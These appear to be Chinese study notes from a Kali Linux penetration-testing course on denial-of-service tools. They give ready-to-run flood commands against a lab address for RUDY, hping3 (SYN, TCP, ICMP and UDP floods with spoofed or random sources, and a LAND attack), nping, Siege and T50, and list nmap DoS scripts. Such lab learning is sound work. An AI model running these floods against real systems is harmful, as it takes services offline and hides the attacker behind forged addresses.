本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程
1. rudy
1. 简介
- 慢速应用层HTTP POST攻击,与slowhttptest原理相同
- 每次只传输一个字节的数据
- 美剧黑客军团”中曾提到此攻击手段
- 攻击有表单WEB页面,攻击时需指定攻击的参数名称
- https://sourceforge.net/projects/r-u-dead-yet/
2. 测试
root@kali:~/rudy# ls
BeautifulSoup.py README r-u-dead-yet-v2.2.py socks.pyc
BeautifulSoup.pyc rudeadyet.conf socks.py
修改配置文件
root@kali:~/rudy# ./r-u-dead-yet-v2.2.py
2. Hping3
1. 简介
几乎可以定制发送任何 TCP/IP 数据包,用于测试 FW、端口扫描、性能测试
syn flood 攻击
- hping3 -c 1000 -d 120 -S -w 64 -p 80 –flood –rand-source 10.10.10.132
- hping3 -S -P -U -p 80 –flood –rand-source 10.10.10.132
- hping3 -SARFUP -p 80 –flood –rand-source 10.10.10.132 (TCP Flood)
ICMP Flood 攻击
- hping3 -q -n -a 1.1.1.1 –icmp -d 200 –flood 10.10.10.132
UDP Flood 攻击
- hping3 -a 1.1.1.1 –udp -s 53 -d 100 -p 53 –flood 10.10.10.132
2. 攻击
syn_flood 攻击
root@kali:~# hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source 10.10.10.132
hping3 -S -P -U -p 80 --flood --rand-source 10.10.10.132
tcp_flood 攻击
root@kali:~# hping3 -SARFUP -p 80 --flood --rand-source 10.10.10.132
icmp_flood 攻击
-a 伪造源地址 root@kali:~# hping3 -q -n -a 1.1.1.1 --icmp -d 200 --flood 10.10.10.132
udp_flood 攻击
root@kali:~# hping3 -a 1.1.1.1 --udp -s 53 -d 100 -p 53 --flood 10.10.10.132
3. LAND 攻击
- 特殊种类的 SYN Flood 攻击
- 源地址和目的地址都是靶机IP,受害者和自己完成三次握手
hping3 -n -a 10.10.10.132 -S -d 100 -p 80 –flood 10.10.10.132
root@kali:~# hping3 -n -a 10.10.10.132 -S -d 100 -p 80 --flood 10.10.10.132
3. nping
TCP 全连接 DoS 攻击
- nping –tcp-connect –rate=10000 -c 1000000000 -q 10.10.10.132
查公网 IP
- nping –echo-client “public” echo.nmap.org –udp
4. Siege
- http/https 压力测试工具,模拟多个用户并发访问请求
- siege -g http://10.10.10.132
- siege -i -c 1000 http://10.10.10.132 -A siegehttp
- 同时攻击多个 url ,使用 -f 调用字典文件
单独使用 siege -i -c 1000 ,也会调用字典文件(url 列表)
/etc/siege/urls.txt
# 查看 banner 信息 root@kali:~# siege -g http://10.10.10.132
root@kali:~# siege -i -c 1000 http://10.10.10.132 -A Mozilla/5.0
root@kali:~# cat /etc/siege/urls.txt
root@kali:~# siege -i -c 1000
5. T50
网络压力测试
- t50 10.10.10.132 –flood –turbo -S –protocol TCP –dport 80
t50 10.10.10.132 –flood –turbo -S TCP UDP OSPF EIGRP –dport 22
root@kali:~# t50 10.10.10.132 --flood --turbo -S --protocol TCP --dport 80
6. nmap
root@kali:~# grep dos /usr/share/nmap/scripts/script.db | cut -d "\"" -f 2
broadcast-avahi-dos.nse
http-slowloris.nse
ipv6-ra-flood.nse
smb-flood.nse
smb-vuln-conficker.nse
smb-vuln-cve2009-3103.nse
smb-vuln-ms06-025.nse
smb-vuln-ms07-029.nse
smb-vuln-ms08-067.nse
smb-vuln-ms10-054.nse
smb-vuln-regsvc-dos.nse